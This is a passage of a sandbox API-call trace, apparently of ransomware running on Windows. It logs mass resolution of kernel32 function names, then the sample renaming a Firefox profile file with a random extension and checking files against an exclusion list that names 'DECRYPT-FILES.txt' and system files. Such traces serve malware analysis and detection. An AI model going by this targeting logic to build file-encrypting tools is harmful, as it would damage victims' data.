lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.002] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.002] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.002] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.002] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.002] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.002] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.002] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.002] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.002] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.002] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.002] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.002] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.003] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.003] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.003] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.003] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.003] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.003] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.003] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.003] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.003] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.003] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.003] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.003] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.003] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.003] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.003] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.003] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.003] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.003] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.003] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.004] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.004] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.004] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.004] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.004] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.004] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.004] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.004] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.004] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.004] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.004] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.004] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.004] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.004] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.004] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.004] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.004] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.004] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.004] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.004] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.005] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.005] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.005] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.005] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.005] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.005] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.005] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.005] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.005] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.005] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.005] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.005] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.005] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.005] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.005] lstrlenA (lpString="DELETEATOM") returned 10 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.005] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.005] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.006] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.006] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.006] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.006] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.006] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.006] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.006] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.006] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.006] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.006] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.006] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.006] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.006] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.006] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.006] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.006] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.006] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.006] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.006] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.006] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.007] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.007] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.007] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.007] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.007] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.007] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.007] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.007] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.007] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.007] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.007] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.007] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.007] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.007] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.007] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.007] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.007] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.007] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.007] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.008] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.008] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.008] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.008] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.008] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.008] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 101 [0082.008] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.6iRNggg") returned 109 [0082.008] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.6iRNggg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.6irnggg"), dwFlags=0x0) returned 1 [0082.009] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.009] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.009] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.009] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x12069be0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x0, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0082.009] lstrcmpiW (lpString1="prefs.js", lpString2="DECRYPT-FILES.txt") returned 1 [0082.009] lstrcmpiW (lpString1="prefs.js", lpString2="autorun.inf") returned 1 [0082.009] lstrcmpiW (lpString1="prefs.js", lpString2="boot.ini") returned 1 [0082.009] lstrcmpiW (lpString1="prefs.js", lpString2="desktop.ini") returned 1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat") returned 1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="iconcache.db") returned 1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="bootsect.bak") returned 1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat.log") returned 1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="thumbs.db") returned -1 [0082.010] lstrcmpiW (lpString1="prefs.js", lpString2="Bootfont.bin") returned 1 [0082.010] lstrlenW (lpString="prefs.js") returned 8 [0082.010] lstrcmpiW (lpString1="js", lpString2="lnk") returned -1 [0082.010] lstrcmpiW (lpString1="js", lpString2="exe") returned 1 [0082.010] lstrcmpiW (lpString1="js", lpString2="sys") returned -1 [0082.010] lstrcmpiW (lpString1="js", lpString2="dll") returned 1 [0082.010] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.010] lstrlenW (lpString="prefs.js") returned 8 [0082.010] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.010] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" [0082.010] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.010] CreateFileW 